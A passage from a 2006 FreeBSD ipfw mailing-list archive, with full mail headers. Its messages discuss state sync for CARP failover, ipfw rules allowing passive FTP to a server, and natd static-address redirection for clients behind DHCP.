synchronisation mechanism for ipfw similar to pfsync. And then any ideas around implimentation. I have 2 firewalls with CARP interfaces for failover, but at failover time the backup's state will not be in sync. If nobody else is currently working on this or even wants to I'm happy to try to convince my boss I should spend some time trying to make it work. Ian -- Ian Freislich From owner-freebsd-ipfw@FreeBSD.ORG Thu Sep 7 21:17:10 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8526116A4DD for ; Thu, 7 Sep 2006 21:17:10 +0000 (UTC) (envelope-from admin2@enabled.com) Received: from typhoon.enabled.com (typhoon.enabled.com [216.218.220.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0C06F43D72 for ; Thu, 7 Sep 2006 21:17:03 +0000 (GMT) (envelope-from admin2@enabled.com) Received: from [172.24.241.5] (natint3.juniper.net [66.129.224.36]) (authenticated bits=0) by typhoon.enabled.com (8.13.8/8.13.8) with ESMTP id k87LH3SM055321 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO) for ; Thu, 7 Sep 2006 14:17:03 -0700 (PDT) (envelope-from admin2@enabled.com) Message-ID: <45008C28.3000807@enabled.com> Date: Thu, 07 Sep 2006 14:16:24 -0700 From: Noah User-Agent: Thunderbird 1.5.0.5 (Macintosh/20060719) MIME-Version: 1.0 To: freebsd-ipfw@freebsd.org Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Subject: rc.firewall rule for passive FTP from FTP server side X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 07 Sep 2006 21:17:10 -0000 It appears that FTP clients using FTP are not able to interact passively with my FTP server. I am wondering if there is a rule somebody could point me to that works rather well. ${ip} is the IP address fo the server (not the client). this does not work. ---- snip ---- #/** Allow setup of FTP PASSIVE **/ ${fwcmd} add allow tcp from ${ip} to any 1024-65534 keep-state ${fwcmd} add allow tcp from ${ip} to any 21 keep-state --- snip ---- cheers, Noah From owner-freebsd-ipfw@FreeBSD.ORG Fri Sep 8 05:15:00 2006 Return-Path: X-Original-To: freebsd-ipfw@freebsd.org Delivered-To: freebsd-ipfw@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EB47316A4DF for ; Fri, 8 Sep 2006 05:15:00 +0000 (UTC) (envelope-from mikexplorer@mail.ru) Received: from mx27.mail.ru (mx27.mail.ru [194.67.23.64]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1F47143D46 for ; Fri, 8 Sep 2006 05:15:00 +0000 (GMT) (envelope-from mikexplorer@mail.ru) Received: from [212.248.51.146] (port=44070 helo=mike.gard.local) by mx27.mail.ru with esmtp id 1GLYhe-0000m5-00 for freebsd-ipfw@freebsd.org; Fri, 08 Sep 2006 09:14:58 +0400 Date: Fri, 8 Sep 2006 09:14:58 +0400 From: Mikhael Y Danilenko X-Mailer: The Bat! (v3.62.14) Professional X-Priority: 3 (Normal) Message-ID: <1605302864.20060908091458@mail.ru> To: freebsd-ipfw@freebsd.org In-Reply-To: <45008C28.3000807@enabled.com> References: <45008C28.3000807@enabled.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: Re: rc.firewall rule for passive FTP from FTP server side X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Mikhael Y Danilenko List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 08 Sep 2006 05:15:01 -0000 Hi, Noah. N> ---- snip ---- N> #/** Allow setup of FTP PASSIVE **/ N> ${fwcmd} add allow tcp from ${ip} to any 1024-65534 keep-state N> ${fwcmd} add allow tcp from ${ip} to any 21 keep-state N> --- snip ---- My FTP server run as ftp server and client (for download software), and my ipfw rule: # Allow setup of incoming ftp ${fwcmd} add pass tcp from any to ${ip} 21 setup keep-state ${fwcmd} add pass tcp from any to ${ip} 49152-65535 setup keep-state # Allow setup of outgoing TCP connections only ${fwcmd} add pass tcp from ${ip} to any setup keep-state From owner-freebsd-ipfw@FreeBSD.ORG Fri Sep 8 15:21:03 2006 Return-Path: X-Original-To: ipfw@freebsd.org Delivered-To: freebsd-ipfw@FreeBSD.ORG Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8EC8516A4E5 for ; Fri, 8 Sep 2006 15:21:03 +0000 (UTC) (envelope-from adam.egan@gmail.com) Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.190]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0DDC343D6E for ; Fri, 8 Sep 2006 15:20:56 +0000 (GMT) (envelope-from adam.egan@gmail.com) Received: by nf-out-0910.google.com with SMTP id n29so742956nfc for ; Fri, 08 Sep 2006 08:20:55 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=b5fBVG2/JGmWE2YH5HPPZmMeKE54byvzqyZuGZRjaxXWfdTRwwzJXXhG8Aiv9EWdyx6jotpx2Lhsbn80nA1v1YC0vUR6xkDsc3t2vZbBqUPMwXpSNIBCVfv+DhcBJIKIeq5Cp2UGgmvMbNeHBttscVVDWrQchcX9vpmOIrgqohk= Received: by 10.49.10.3 with SMTP id n3mr4304107nfi; Fri, 08 Sep 2006 08:20:54 -0700 (PDT) Received: by 10.78.165.18 with HTTP; Fri, 8 Sep 2006 08:20:54 -0700 (PDT) Message-ID: <28745bbf0609080820i50615dfdl6f8989ffda859704@mail.gmail.com> Date: Fri, 8 Sep 2006 16:20:54 +0100 From: "Adam Egan" To: ipfw@freebsd.org In-Reply-To: <525121136.20060906224135@spaingsm.com> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <002e01c6d1e8$f0b772d0$4602a8c0@Laptop> <525121136.20060906224135@spaingsm.com> Cc: Subject: Re: IPFW and natd X-BeenThere: freebsd-ipfw@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: IPFW Technical Discussions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 08 Sep 2006 15:21:03 -0000 >> I need to assign certain clients behind the firewall their own static external ip that is >> accessible from the outside and also make sure they go out using this ip. > Use redirect_address option in natd.conf to assign ip's and option Does this setup work fine using a DHCP server to assign the internal IP addresses? Obviously with address reservations (such as by physical/MAC address). Adam